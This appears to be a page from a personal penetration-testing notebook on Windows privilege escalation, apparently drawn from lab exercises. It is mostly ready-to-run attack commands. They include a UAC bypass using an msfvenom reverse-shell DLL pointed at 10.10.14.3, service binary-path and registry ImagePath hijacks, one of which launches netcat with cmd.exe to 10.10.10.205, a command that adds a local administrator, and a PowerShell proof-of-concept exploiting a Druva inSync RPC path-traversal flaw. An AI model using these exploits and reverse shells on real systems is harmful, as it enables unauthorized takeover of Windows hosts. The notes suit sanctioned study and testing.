Martian Defense NoteBook
  • Martian Defense Notebook
  • Training and Career
    • Keeping it Real for Beginners
    • Reading and Repos
    • Media
    • Guides
      • Cybersecurity Roadmaps
      • Cybersecurity Training Topics
      • AppSec Training Pathway
      • Interview Checklist
    • Platforms
      • General
      • Offensive Security
      • Defensive Security
      • CTF Sites
      • Live Vulnerable Sites
    • Entrepreneurship Roadmaps
      • Consulting
      • Starting a Business
  • Technical Resources
    • Offensive-Cybersecurity
      • Application Security
      • General
      • Recon + OSINT
      • Infrastructure Pentesting
      • Cloud Pentesting
      • Wordlists
      • Social Engineering
      • Mobile Pentesting
      • Container Security
      • Blockchain
    • Defensive-Cybersecurity
    • General Cybersecurity
      • Cybersecurity Operating Systems
    • Coding/Programming
    • Reverse Engineering
    • AI and ML
  • Notes
    • Product Security Engineering
      • DevSecOps
        • Docker
          • How to Dockerize Applications with Docker Compose (Using SQLite and Flask)
      • SAST/SCA
        • How to setup a GitHub Action for Code Security analysis
        • JavaScript Security Analysis
        • Java Security 101
        • Tools
        • CodeQL for Beginners
      • Product Security Hardening
      • Threat Modeling
      • PHP Security
    • AppSec Testing
      • Checklists
        • WEB APP PENTESTING CHECKLIST
        • API Testing Checklist
        • Android Pentesting Checklist
        • IoS Pentesting Checklist
        • Thick Client Pentesting Checklist
        • Secure Code Review Checklist
      • Targeted Test Cases
        • Part 1
        • Part 2
      • Common Web Attack and Prevention List
      • Ports and associated Vectors
      • DNS
      • Web Tools
      • Command Injection Testing
      • JWTs and JSON
    • Security Research
      • Publishing CVEs
      • Threat Intelligence
      • Shodan Dork Cheatsheet
      • Github Dorks
      • Bug Bounty
        • Bug Bounty Programs
      • Forums
    • Coding/Programming
      • Secure Coding Practices Checklist
      • JavaScript
      • Python
        • Quick Notes
        • Python Basics for Pentesters
        • Python Snippets
        • XML Basics with Python
      • Golang
        • Theory
        • Security
        • Modules
        • Entry Points
        • File Forensics
        • Cryptography and Encoding
        • Golang Snippets
      • PHP
        • Setup
        • Syntax
        • Variables and Data Types
        • Control Structures
        • Arrays
        • Functions
        • OOP Concepts
        • Database Integration
        • Handling HTTP Methods
        • Session Management
        • File Uploads
        • Email Function
        • Error Handling
        • Advanced Topics and Best Practices
    • Network Security
      • Domain Trust Enumeration
      • Bleeding Edge Vulnerabilities
      • Post-Exploitation
      • Access Control Lists and Entries (ACL & ACE)
      • Credentialed Enumeration
      • Password Attacks
        • Internal Password Spraying
        • Remote Password Attacks
        • Linux Local Password Attacks
        • Windows Local Password Attacks
        • Windows Lateral Movement
      • PowerView
      • Pivoting, Tunneling and Forwarding
        • Advanced Tunneling Methods
        • Dynamic Port Forwarding (SSH + Socks)
        • Port Forwarding Tools
        • SoCat
      • Linux Privilege Escalation
      • Windows Privesc
        • OS Attacks
        • Windows User Privileges
        • Windows Group Privileges
        • Manual Enumeration
        • Credential Theft
      • Kerberos Attacks
        • Kerberos Quick Reference Sheet
    • Cloud Security Testing
    • Defensive Security
      • Splunk
        • Basic Queries
        • Dashboards
      • Forensics
        • Volatility
      • WireShark filters
    • Governance, Risk, Compliance
      • Vulnerability Management Lifecycle
    • Capture-the-Flag Training
      • Vulnerable Machine Checklist
      • Reverse Engineering Checklist
      • Mobile Checklist
      • Forensics Checklist
      • Binary Exploitation
      • Cryptography Checklist
    • Reporting
    • PowerShell
    • Linux Basics
    • Basic IT Tasks
  • Digital Privacy and Hygiene
    • Personal Information Removal Services
    • De-Googling Android
    • DNS Services
    • Privacy References
    • Opsec
  • RedPlanet Labs
    • PyGOAT
    • OWASP Juice Shop
Powered by GitBook
On this page
  • User Account Control (UAC)
  • Confirming UAC Enabled
  • Checking UAC Level (When Enabled)
  • Bypassing UAC (Method)
  • Weak Permissions
  • Weak Permission Audit
  • Unquoted Service Path
  • Check Weak Service ACL (Accessschk.exe)
  • Modify Image-Path
  • Vulnerable Services
  • Gather Installed Programs
  • Gather Running Service
  1. Notes
  2. Network Security
  3. Windows Privesc

OS Attacks

User Account Control (UAC)

Confirming UAC Enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Checking UAC Level (When Enabled)

 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

https://github.com/hfiref0x/UACME

Bypassing UAC (Method)

# Checking Path Variable
cmd /c echo %PATH%

# Generate Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll

# Test Reverse Shell
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll

# Execute UAC
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Weak Permissions

Weak Permission Audit

https://github.com/GhostPack/SharpUp/

.\SharpUp.exe audit

Manually Permission Check

icals <filepath>

1 Replace Service Bin Path

sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

2 Restart Service

sc start WindscribeService

Unquoted Service Path

Find Unquoted Service Paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Check Weak Service ACL (Accessschk.exe)

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

Modify Image-Path

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

Vulnerable Services

Gather Installed Programs

wmic product get name

Gather Running Service

get-service | ? {$_.DisplayName -like 'Druva*'}

PoC

$ErrorActionPreference = "Stop"

$cmd = "net user htb-student /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
PreviousWindows PrivescNextWindows User Privileges

Last updated 5 months ago